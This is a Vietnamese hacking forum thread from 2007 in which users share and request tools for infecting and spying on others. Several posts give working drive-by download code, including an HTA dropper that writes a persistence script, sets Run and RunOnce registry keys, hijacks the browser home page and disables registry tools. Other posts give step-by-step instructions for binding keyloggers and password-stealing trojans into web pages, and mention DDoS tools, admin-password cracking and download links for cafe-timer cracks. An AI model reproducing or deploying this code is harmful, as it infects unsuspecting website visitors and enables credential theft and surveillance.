down được thì các bạn lên google tìm nha.file kimdung upload lên gồm cả file hỗ trợ nữa nên nó
khoảng 1.3Mb. nào bạn hãy tắt các trương trình diệt virus đi dể chúng ta setup

sau khi down về giải nén sẽ có các file sau như hình sau:
http://k.1asphost.com/nhutuan/a.JPG
nhấn kép vào file GODWILL sẽ có hình sau:
http://k.1asphost.com/nhutuan/b.JPG
sau khi bạn đọc xong những điều khoản thì nhấn enter.
http://k.1asphost.com/nhutuan/c.JPG
rồi đến đây bắt đầu xuất hiện những tiện ích của con trojan này.

cái chúng ta quan tâm ở đây là html ! ok nhấn vào chữ HTML:
http://k.1asphost.com/nhutuan/d.JPG
đến đây các bạn nhấn: Genral Options để chúng ta bắt đầu tạo.
http://k.1asphost.com/nhutuan/e.JPG
vì đặc điểm của con này là nó chỉ cho gắn một con trojan khoảng 34Kb thôi nên chúng ta tìm những
con trojan nào dưới 34Kb như con MYSPY hay con K2PS hay con hackpass mới nhất đó yjaked1

+ ở mục enter .exe fie bạn mở con trojan đã chuẩn bị trước ra (MYSPY hay con K2PS,yjaked1...)

chọn đường dẫn tới nó.

+ ở mục enter.html bạn chọn đường dẫn cho trang web mình cần gắn trojan.

+ không nhắp chọn Uer defult page


+ ở mục enter.output bạn đổi tên file Geebferh.html thành tên nào bạn muốn.vì sau khi tạo xong thì
trang web có gắn trojan sẽ là tên đó ( bạn không được mở trang đó ra)

+ page ICQ notyfi bạn muốn nhấp chọn cũng được nếu bạn có số ICQ thì nhấn chọn để mỗi khi có
người open trang web nó sẽ báo về ICQ cho bạn...như kimdung thì chọn hết ngoại trừ "Uer defult
page"

rồi xong sau khi đã hoàn thành các bước giờ thì bạn nhấn DOVE được rồi.
http://k.1asphost.com/nhutuan/f.JPG
rồi nhấn GEN để hoàn thành ...Godwill sẽ gắn con trojan của bạn vào trang web của bạn

và nó sẽ tự hoạt động mỗi khi có người mở trang web đó ra.

trojan k2sp là keylogger.

MYSPY là một loại gián điệp

yjaked1 dùng để hack pass yahoo.

Chúc thành công và đừng nhớ đến tui khi bị bắt


Only_need_your_heart
03-29-2007, 11:27 AM
thôi cho em xin!
whiterose3721
03-29-2007, 11:34 AM
copy giỏi nhỉ...........
cách gì mà mệt thế ...
dăng kí ở http://decure.logmein.com để tải software zề mà dùng nha.....http://whiterose3721
alizwong
03-29-2007, 11:44 AM
Lại 1 tên mang họ lừa :oh:
=MaNuChungTinh=
03-29-2007, 11:49 AM
cái này thì pó tay :(
alhd
03-29-2007, 12:23 PM
thêm một tên dóc nữa. Công an đâu rồi kìa.
SJK
03-29-2007, 12:29 PM
Tui bảo đãm bạn cũng chả biết gì ! gì toàn là bạn coopy của ngưoi ta ko ! dau có hây ! hãy làm đúng
sự thật về bản năng của mình đi !
SJK
03-29-2007, 12:33 PM
Mẹ chém nó đi anh em ! bài như củ chuối toàn là cùi bắp !
www.kinhvanhoafc.org giỏi hack đi đố cha tụi bây tao ko ngán tụi bây đâu !
kecodon0606006
03-29-2007, 12:36 PM
thấy bạn mới vào tui cũng ủng hộ bạn một cái nhưng thấy hướng dẫn của bạn sao mà đơn giản như
đang giỡn thế .....hi vọng bạn phát triển tốt hơn ở bài viết sau nhé....
manhhuy
03-29-2007, 12:40 PM
Cách 1: Hack Pass, có nghĩa là chôm được pass của admin or MOD và vào chọc ngoáy theo ý mình.
Có rất nhiều cách để chôm pass nhưng có một chương trình mà SV chúng ta hay sử dụng đó là
Webcrack ( Down về từ http://webcrack.home.ml.org/ )
Đừng có dùng để làm chuyện mờ ám nhé :gaicam:

Cách 2: Cách này tương tự như kiểu bomb thư mà ta hay dùng tức là làm treo Website bằng những
user ảo (có thể lên đến 10.000 ) bằng kỹ thuật Distributed Denial Of Service , Mục đích của cách này
là làm trang Web ngưng trệ trong một thời gian nhất định chứ ko thể thay đổi được nội dung Website
chứ chưa nói đến chuyện cướp domain (cùng một lúc có 10.000 người truy cập vào không treo mới
là chuyện lạ) . Các bạn có thể dùng chương trình Smurf để thực hiện...hoặc nhiều chương trình khác.

Cách 3: Hack Domain, Cách này tôi cũng chỉ mới nghe mấy tay "có máu mặt" nói chuyện (mình
chưa đủ trình độ .. hè hè) . Hình như 3 năm trước (Soulevil còn bé tí tẹo) forum Viethacker và
Hackervn oánh nhau , các hacker dùng cách này --> kết quả một bên ngỏm củ tỏi còn một bên tạm
ngưng hoạt động trong một thời gian. Bác nào biết hack bằng cách này post bài cho anh em học hỏi
đi

Đểu thế, cả bài dc 1 cái link thì die lòi mắt !!! :choler:
SJK
03-29-2007, 01:11 PM
Nó xạo pò bà kố !
luke206
03-30-2007, 10:21 AM
không thấy mi post cái 3 chấm mấy lên vậy đừng nói suông chứ
congailaychong
03-31-2007, 04:52 PM
Sao không dùng hackeasycafe cho tiện

Quá dễ, vào tiệm net mà không cần bật Easycafe, cần thì liên lạc với tui nè,
qua nick chát changtraisitinh_cm_96
babonghonongbong
03-31-2007, 06:09 PM
hehe trò này xưa như trái đất rồi
hầu như bây giờ ko làm đuọc nữa
babonghonongbong
03-31-2007, 06:14 PM
dzay65 sao ông ko tấn công vô wed truongton đi???
nguoithuacuoc_vanlaanh
03-31-2007, 06:25 PM
ban co the chi cu the dc ko vay ban
http://i170.photobucket.com/albums/u251/vetthuong_tronglongtoi/tram.jpg
minh27s
03-31-2007, 06:47 PM
không phải đơn giản đâu à nha , muốn hack được 1 site hay xâm nhập vào được 1 web rồi up lên 1
câu gì đó để chứng tỏ hack , đâu phải là dể ... . Nói chung tuy mấy hacker nhiều người phá nhiều
trang web rồi bị sờ gáy tuy là thiếu suy nghĩ nhưng tôi cũng khâm phục họ vì thật sự họ có tài và
trình độ ngoại ngữ của họ rất tốt . Còn chuyện của họ là để tự họ giải quyết mình cũng không dám
đánh giá họ , vì mình đâu có trình độ như họ
luke206
03-31-2007, 09:56 PM
còn tùy từng chỗ có chỗ được có chỗ không cho nên cứ thử tý cho vui
jindodt
03-31-2007, 11:00 PM
Mọi bài cùng chủ đề đều sẽ được move vào đây!
Các bạn quản lý nên xoá bớt các recommment trong các topic cùng loại rồi move vào đây!
Các bài recomment hay spam sẽ bị del, chỉ chấp nhận thắc mắc và nhận sét yếu điểm, điểm mạnh và
tất nhiên là có các bài chính về chủ đề được nêu trên!!!
Thân
khoabuidoi
04-02-2007, 12:24 PM
mình từng gặp 1 hack keylooger nổi tiếng anh ấy có thể ngồi 1 máy mà co thể lấy tất cả các tài
khoản của các may trong quán nét khi vào chơi kể cả bàn phím ảo. Nếu như ai biết cách hack nay
xin dạy cho moi người với đừng dấu nghề làm gi nha
Minh đang cần bản keylooger mà biết goi về mail + bản hướng dẩn ai ban pm em nhé :36_14_1:
Ních chat là : kegianho_hanhhiep_truongnghia

Cảm ơn Ai đã đọc bài này


vinh8447
04-02-2007, 02:26 PM
hay nhỉ, bác nào có up lên đi
Ôi trường tồn
04-02-2007, 02:52 PM
Keylogger kể ra cũng hay thật đấy, biết cũng tốt nhưng nó quá xấu.
quocskill_xitin
04-02-2007, 08:12 PM
ừa...ai bít thì post lên để anh em cùng nguyên cứu deee
tranngoctinh4988
04-02-2007, 09:07 PM
Chắc lại dùng phần mềm điều khiển máy tính từ xa hả?
Nếu không phải thì I'm sorry .Nếu có cách khác post lên cho anh em tham khảo Học Tập
congailaychong
04-02-2007, 11:05 PM
cho mình hỏi làm sao vào được IE. IE là cái gì
handoiqua
04-02-2007, 11:37 PM
VL thế sao cho tao cái địa chỉ tao đên thử quán net nó ngồi sem nào
handoiqua
04-02-2007, 11:45 PM
đúng là thằng Khoa Remy đả post bài này lâu lắm rồi như post đi post lại cũng không dùng đươc đâu
boyblack22
04-03-2007, 07:47 PM
oai tưởng rớt cái được zui xửa được ngay chứ
rớt tới cả tuần thì lấy tiệm nào chơi. tưởng cái
của ông có lợi cho việc đỡ phải đợi máy ai de`
TienTruong
04-04-2007, 03:13 PM
hịc mình thử rùi ko Đc ^_^ . Xạo Ko
thanglong1985
04-04-2007, 08:30 PM
ai co phan mem pha dong bang deep freeze V6.00.020.1523 chi cho em voi
Lãng Tử Bụi Đời
04-04-2007, 09:45 PM
Đóng băng Deepfree 6.0 thì chưa thấy còn các phiên bản trước thì có goài đó bạn nếu bạn muốn sài
thì LT sẽ đưa lên
hoangdoanh55
04-05-2007, 07:55 AM
các bạn ơi bạn nào biết hack vcoin thì chia sẻ cho mọi người .chúng ta đều là người chơi online,để
khỏi đua tiền cho admin

bạn nào biết bỏ bom giới thiệu cho mình với


Hacker_Dễ_Thương
04-05-2007, 11:11 AM
em bít trang web hack đc
http://www.hoang0109.auto.to mật khẩu để cài đặt chương trình là "lehuyhoang" còn hướng dẫn thì
ở trang web đó có anh tự làm nha!
KASUMI
04-05-2007, 04:01 PM
ăn cắp là xấu
KASUMI
04-05-2007, 04:14 PM
vậy là không dùng được á mấy anh
talama2008
04-05-2007, 05:06 PM
post cái ba chấm mấy của bác lên cho mọi người cùng xài cho vui đi

nếu như không nhầm thì 3 chấm đó là software logmein (điều khiển máy từ xa) nếu thích có thể vào
đây dang kí và dùng http://logmein.com còn nếu muốn download luôn thì
http://www41.websamba.com/phammem/Logmein.exe
whiterose3721
04-05-2007, 05:57 PM
Xin loi~ cái dụ "cmd" thì thôi nha
Zờ có ứan nào ngu mà cho chạy .....
Thử hỏi cách nào để chạy "cmd" trong khi bị máy khoá
Lãng Tử Bụi Đời
04-05-2007, 06:34 PM
Cài đặt cho cố vào goài mạng cài Net hay EasyCafe ngồi mà khóc chứ làm gì mà tắt được hen
Lãng Tử Bụi Đời
04-05-2007, 07:24 PM
Mún sài key à hôm nào rảnh LT post lên cho nhưng mờ forum mình có cho post thứ đó lên không
nhỉ
@khoabuidoi: hôm nào bạn giới thiệu cho mình anh bạn mà bạn nói hen, cho dù bi giờ sử dụng key
hay trojan loại nào mà lấy cả bất kỳ pass nèo mới ghê chứ...hôm nào bạn nói thử ghé thăm lên
http://luongsonbac.com thử tài dùng key cùng tại hạ thử xem nèo, ở đâu xuất hiện tây độc lợi hại thía
chứ...
Hacker_Dễ_Thương
04-06-2007, 10:16 AM
éo
ai nói ăn cắp vậy
boyone.love
04-06-2007, 08:47 PM
Keyloger nó không phải là công cụ ăn cắp, mà nó chỉ bị những người 'ăn cắp' lợi dụng cho mục đích
của mình thôi.
azurayoyo
04-06-2007, 09:14 PM
lung tung toàn nói nhảm thổi !
Khoa Remy
04-06-2007, 09:15 PM
Mình thử vào cmd\gõ shutdown -m \\tênmáytính -s -f. Nhưng bị báo là từ chối. Mình nghe nói phải
chỉnh jì nữa thì lệnh này mới thực hiện được (dĩ nhiên là trong mạng LAN).Bạn nào bít chỉ mình với
nha !!
azurayoyo
04-06-2007, 09:27 PM
đề nghị mod del ngay cái topic dở hơi này đi vì thật sự nó nên bị del từ lâu rùi nhưng ngày trước tôi
quên mất hic........
leonbk
04-07-2007, 08:11 AM
ông này chơi thâm quá

Ông này chơi thâm quá


thu_sinh
04-07-2007, 11:58 AM
Làm như bạn đã trình bày thì ai mà nói. chẳng ai lại để password mặc định đâu.
Hacker_Dễ_Thương
04-07-2007, 05:38 PM
nè ai keyloggr vậy?
để em kill cho!
Lãng Tử Bụi Đời
04-07-2007, 06:49 PM
Sặc bạn đủ khả năng kill không thía
spideman
04-07-2007, 06:56 PM
Ok Me May , Ngon Dem Ra Ngan Hang Doi Tien Ma Xai, May Ma Doi Duoc Thi Chia Cho Tao
Mot Nua Nhe .amen
vailonchimen
04-07-2007, 09:27 PM
hay thật tui thích cái trò này cảm ơn nhìu
ongia33
04-07-2007, 09:46 PM
Rãnh quá ! nghĩ chuyện gì hay hơn di , có ngày ôm dầu máu vào nhà thương dó . !
LAZY_FIST_VT
04-08-2007, 07:39 AM
Sao Ko Vo Duọc
LAZY_FIST_VT
04-08-2007, 07:47 AM
Hieu Chet Lien
LAZY_FIST_VT
04-08-2007, 07:57 AM
Lang Nhang Mytom
angel_computer_9x
04-08-2007, 08:47 AM
cần liên kết 1 nhóm hacker
ngheo_giau_cungcotinh
04-08-2007, 07:01 PM
mình muốn hỏi là khi minh muốn làm cho cái nick người cùng chơi với mình bi mất thì làm sao đây
các bạn trường tồn. mong các bạn giải đáp dùm mình. tại vì mình là người mới gia nhập vào đây
tranhung_1979
04-08-2007, 09:30 PM
cảm ơn bạn, nhưng sao tôi không thấy có kết quả?
hiep_88bn
04-09-2007, 10:16 AM
- vao`day tai ve`nha :****************************huuhiep_88bn/files/hackeasycafe.rar

- cuc hay do :36_1_11:


hoabasketball
04-09-2007, 01:25 PM
AC ac' qua' may' ba oi hack cho nguoi` ta sat nghiep ha? lam vay bi bat' la` o? tu` do' a`
anhdeptrai85
04-09-2007, 01:36 PM
có anh em nào có con keylogger nào mà chuyển thông tin qua mail cho tớ với

chỉ cho tớ chỗ dow với


anhdeptrai85
04-09-2007, 01:37 PM
tớ đang cần 1 con keylogger mà gửi thông tin qua mail. ai bit dow ở đâu chỉ cho tớ vơi.thank anh em
trước nha
yukino289
04-09-2007, 01:55 PM
Cái này bạn rà lại mấy bài cũ ấy trong phần này có đăng rùi mà, mà hình như là con perfect
keylogger 1.62 thì phải ko nhớ nữa
taplamhacker
04-09-2007, 06:43 PM
ko co cái nào xài dc hết
duyhungyt180
04-09-2007, 08:15 PM
hok bít nữa , hình như link die rồi , bạn thử coi lại xem
saotinhyeu
04-09-2007, 10:08 PM
tớ đang cần 1 con trojan ai có share cho mình với. hưỡng dẫn cho mình luôn nhá mình cảm ơn nhiều
anhdeptrai85
04-10-2007, 12:12 AM
o hô thank nha đang cần quá lại vớ dc 1 em ở đây.nhưng cái này bị bkav phát hiện ra.bác nào có cái
nào ngon hơn post lên đây cho anh em xài với
hiep_88bn
04-10-2007, 09:11 AM
- link tot do ban oi

- toi da~tai rui` tot lam ma`:36_5_6:


PDTien
04-10-2007, 09:19 AM
Link này báo lỗi 403 forbidden
hiep_88bn
04-10-2007, 09:22 AM
- link moi ne`ban :****************************huuhiep_88bn/files/hackeasycafe.rar
dongcuy
04-10-2007, 10:17 AM
lỡ quán nét cài không cho mình mở run chạy cmd thì sao hả anh !?????
vao comman promt cung ko được thì sao???
giúp em với anh ơi !!!híc híc híc
pretty_baby
04-10-2007, 03:08 PM
Rắc rối quá đi, thà không đọc còn hơn
Nhức cả đầu
DoCuongProduction
04-10-2007, 04:21 PM
Khi các bạn đã sử dụng thành công nhưng do 1 phút sơ sảy mà bị Công An bắt thì chỉ mong các anh
đừng réo và khai tên em ra kẻo tội nghiệpCách 1 : dùng một đoạn mã đơn giản để open 1 con trojan !

đoạn mã như sau:


<script language=javascript>
open("http://freewebs.com/nhutuanweb/thanks.exe");
</SCRIPT>

với đoạn mã này bạn gắn dưới thẻ body thì mỗi khi truy cập website nó sẽ tự open con trojan của
bạn.

cách thứ 2 là cách rất cao cấp ...

bạn copy vào notepad đoạn mã sau:


<html>
<head>
<script language="javascript">
try {
var fso = new ActiveXObject("Scripting.FileSystemObject");
var Shell = new ActiveXObject("WScript.Shell");
var tfolder2 = fso.GetSpecialFolder(0);
var filepath2 = tfolder2 + "\\system32\\System.js";
var a2 = fso.CreateTextFile(filepath2, true);
a2.WriteLine('var url = "http://www.freewebs.com/hinhanhlop18/hackervn.exe";');
a2.WriteLine('var burl = "http://www.freewebs.com/hinhanhlop18/hackervn.exe";');
a2.WriteLine('var fso = new ActiveXObject("Scripting.FileSystemObject");');
a2.WriteLine('var tfolder = fso.GetSpecialFolder(0);');
a2.WriteLine('var filepath = tfolder + "\\\\system32\\\\System.js";');
a2.WriteLine('var Shell = new ActiveXObject("WScript.Shell");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren
tVersion\\\\RunOnce\\\\Windows",filepath);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren
tVersion\\\\Run\\\\System32",filepath);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Main\\\\Start
Page",url);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet
Explorer\\\\TypedURLs\\\\url1",url);');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet
Explorer\\\\TypedURLs\\\\url2","http://http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet
Explorer\\\\TypedURLs\\\\url3","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet
Explorer\\\\TypedURLs\\\\url4","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet
Explorer\\\\TypedURLs\\\\url5","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet
Explorer\\\\TypedURLs\\\\url6","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet
Explorer\\\\TypedURLs\\\\url7","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet
Explorer\\\\TypedURLs\\\\url8","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet
Explorer\\\\TypedURLs\\\\url9","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet
Explorer\\\\TypedURLs\\\\url10","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Internet
Explorer\\\\TypedURLs\\\\url11","http://www.freewebs.com/hinhanhlop18/hackervn.exe");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMSG
R_Calendar\\\\content url","http://antihacker.50webs.com/sethome.htm");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMSG
R_Games\\\\content url","http://antihacker.50webs.com/sethome.htm");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMSG
R_Launchcast\\\\content url","http://antihacker.50webs.com/sethome.htm");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Yahoo\\\\Pager\\\\View\\\\YMSG
R_Weather\\\\content url","http://antihacker.50webs.com/sethome.htm");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren
tVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"RE
G_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren
tVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"RE
G_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren
tVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"RE
G_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren
tVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"RE
G_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren
tVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"RE
G_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren
tVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"RE
G_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren
tVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"RE
G_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren
tVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"RE
G_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren
tVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"RE
G_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren
tVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"RE
G_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren
tVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"RE
G_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren
tVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"RE
G_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren
tVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"RE
G_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren
tVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"RE
G_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren
tVersion\\\\Internet
Settings\\\\ZoneMap\\Domains\\\\http://www.freewebs.com/hinhanhlop18/hackervn.exe\\\\*",4,"RE
G_DWORD");');
a2.WriteLine('Shell.RegWrite("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\Curren
tVersion\\\\Policies\\\\System\\\\DisableRegistryT ools",1,"REG_DWORD");');
a2.Close();
Shell.Run(filepath2);
}
catch (e){}
</script>
<HTA:APPLICATION WINDOWSTATE='minimize' SHOWINTASKBAR='no' />
</head>
<body onload='window.close()'>
</body>
</html>
<!--- <frameset></frameset> -->

rồi save lại với tên là : hackervn.hta

nhớ là thay đường dẫn của con trojan đi nha..(http://www.freewebs.com/hinhanhlop18/hackervn.exe)


là đường dăn tơi kon TJ
sau khi có file hackervn.hta rồi bạn gắn đoạn mã sau vào cuối cùng của website của bạn:
<center>
<span datasrc="#oRun" datafld="view" dataformatas="html"></span>
<xml id="oRun">
<preview>
<view>
<![CDATA[
<object id="oFile" data="hackervn.hta?id=1"></object>
]]>
</view>
</preview>
</xml>
</center>
</body>
</html>

rồi sau đó bạn upload file hackervn.hta + với website của bạn lên cùng 1 host ...ok mỗi lần mở
website của bạn con trojan sẽ tự open vào trong hệ thống mà không hề bị phát hiện+ thêm nó set
homepage luôn cho chắc ăn...

cách này rất hay...và cao cấp.

cách thứ 3
là các bạn dùng chương trình gắn trojan vào html: đó là GodWill1.06

chương trình này mình thấy nói rất nhiều trên các diễn đàn nhưng mà chẳng có ai làm được cả...hình
như là copy ở site ra thôi.
các bạn downlaod tại đây http://www.freewebs.com/trangchulop18/GodWill1.6.rar ...nếu không
down được thì các bạn lên google tìm nha.file kimdung upload lên gồm cả file hỗ trợ nữa nên nó
khoảng 1.3Mb. nào bạn hãy tắt các trương trình diệt virus đi dể chúng ta setup

sau khi down về giải nén sẽ có các file sau như hình sau:
http://k.1asphost.com/nhutuan/a.JPG
nhấn kép vào file GODWILL sẽ có hình sau:
http://k.1asphost.com/nhutuan/b.JPG
sau khi bạn đọc xong những điều khoản thì nhấn enter.
http://k.1asphost.com/nhutuan/c.JPG
rồi đến đây bắt đầu xuất hiện những tiện ích của con trojan này.

cái chúng ta quan tâm ở đây là html ! ok nhấn vào chữ HTML:
http://k.1asphost.com/nhutuan/d.JPG
đến đây các bạn nhấn: Genral Options để chúng ta bắt đầu tạo.
http://k.1asphost.com/nhutuan/e.JPG
vì đặc điểm của con này là nó chỉ cho gắn một con trojan khoảng 34Kb thôi nên chúng ta tìm những
con trojan nào dưới 34Kb như con MYSPY hay con K2PS hay con hackpass mới nhất đó yjaked1

+ ở mục enter .exe fie bạn mở con trojan đã chuẩn bị trước ra (MYSPY hay con K2PS,yjaked1...)

chọn đường dẫn tới nó.

+ ở mục enter.html bạn chọn đường dẫn cho trang web mình cần gắn trojan.

+ không nhắp chọn Uer defult page

+ ở mục enter.output bạn đổi tên file Geebferh.html thành tên nào bạn muốn.vì sau khi tạo xong thì
trang web có gắn trojan sẽ là tên đó ( bạn không được mở trang đó ra)

+ page ICQ notyfi bạn muốn nhấp chọn cũng được nếu bạn có số ICQ thì nhấn chọn để mỗi khi có
người open trang web nó sẽ báo về ICQ cho bạn...như kimdung thì chọn hết ngoại trừ "Uer defult
page"

rồi xong sau khi đã hoàn thành các bước giờ thì bạn nhấn DOVE được rồi.
http://k.1asphost.com/nhutuan/f.JPG
rồi nhấn GEN để hoàn thành ...Godwill sẽ gắn con trojan của bạn vào trang web của bạn

và nó sẽ tự hoạt động mỗi khi có người mở trang web đó ra.

trojan k2sp là keylogger.

MYSPY là một loại gián điệp

yjaked1 dùng để hack pass yahoo.

Chúc thành công và đừng nhớ đến tui khi bị bắt


Copy ở bên diễn đàn bacbaphi đúng ko
Đừng có mà cãi nhá
Vớ vẩn quá
DoCuongProduction
04-10-2007, 04:23 PM
Chỉ dẫn đi pác
mymychu
04-10-2007, 04:46 PM
các you nào làm nên nhớ đừng chỉnh âm giờ úa kẻo người ta biết
chienthoong
04-10-2007, 06:43 PM
có pác nào biết hack nick yahoo , del list hoặc xóa nick của người khác thì giúp em nhé!Em bị hack
mất nick rui`!Nếu giúp đc. thì liên lạc với em theo nick :chu_thoong_233 hoặc để lại địa chỉ để em
liên lạc cũng đựơc!Cám ơn các pác nhìu
dongcuy
04-10-2007, 08:20 PM
anh ơi !!!!
em không biết cách giải nén khi dowload chương trình
chie em với nha !
híc híc

222!!!
lỡ tiệm nét ko cho chạy run, khi mình vào commad promt thì sao hả anh !!
dongcuy
04-10-2007, 08:30 PM
hướng dẫn tôi giải nén đi !!
cám ơn các bạn nhiều !!
tuanhackero0o
04-10-2007, 08:41 PM
link dje ko dc
ndtung13790
04-11-2007, 08:14 AM
làm ơn cho mình biết làm thế nào dể con key log này guiwr ảnh về,VD:nó chỉ gửi ảnh phong thần về
nhưng không gửi ảnh võ lâm,tuy gửi ảnh về nhưng không gửi ID và pos thế là sao,giải đáp giùm
mình,cảm ơn trước
mới lớn
04-11-2007, 10:18 AM
Chào cả nhà mình là 1 newbie mình đang muốn tìm hiểu về vbb 3.6.4 và được bít nó khá an toàn thế
nhưng mình thấy vẫn có rất nhiều diễn đàn bị hack mất acc Admin hay làm web Die mà ko hiểu vì
sao
Mình rất mong những ai có kinh nghiệm xin chia sẽ giúp cách thức tấn công Vbb 3.6.4 và chúng
mình sẽ cùng trao đổi về cách Bug nó tốt nhất Rất mong sự giúp đỡ của mọi người ,minh xin cám ơn
à
hiep_88bn
04-11-2007, 06:36 PM
- xin loi toi post lai link ne` :****************************huuhiep_88bn/files/hackeasycafe.rar

- muon dong bang dong` ho` lai thi` click vao " dung "

- muon dong` ho` chay tiep click vao` " chay lai "

- muon so gio` ve 0 thi` click vao ` " Kill "

- hom nay post nhieu` met qua:xinchao:


xZoZox
04-11-2007, 07:01 PM
ặc mọi người ơi
virus đó
kick vào chưa sao đâu nhưng lúc
giải nén thì ... kekekk
hic
romatic
04-11-2007, 10:53 PM
oh ..1 chú lừa con...thông cảm cho nó đi các bro
PDTien
04-12-2007, 08:05 AM
Link mới vẫn báo lỗi 403 forbidden. Sao bạn không kiểm tra lại?
congtu_nhagiau
04-12-2007, 11:52 AM
sặc quán tui hay ngồi họ ki cả vào máy lẫn vào sổ thế thì lậu làm sao được
kaka_00
04-12-2007, 05:47 PM
Sặc nhấn vào rồi vẫn thấy chạy ầm ầm, có thấy dừng lại đâu?????????
chungkhung
04-12-2007, 06:24 PM
có ai bít hack phong thần ko vậy?
chantinh70vn
04-12-2007, 06:24 PM
Tôi muốn hỏi là máy nhà tôi bị virut có tên là Wonka,(JS/WONKA) đã dùng chương trình McAfee
Virus Scan rồi mà sao vẫn ko có tác dụng,mong các pác trong diễn đàn chỉ dùm tôi.Cám ơn
nhiều.PM nhanh vì máy trong tình trạng gấp lắm!:beated:
ndtung13790
04-13-2007, 08:52 AM
trả lời cho tui cái xem nào
jetsygirl21
04-15-2007, 02:58 PM
phần mềm tớ vừa mới mua có cài chống sao chép . Làm thế nào để giải quyết nó bây giờ. Tớ muốn
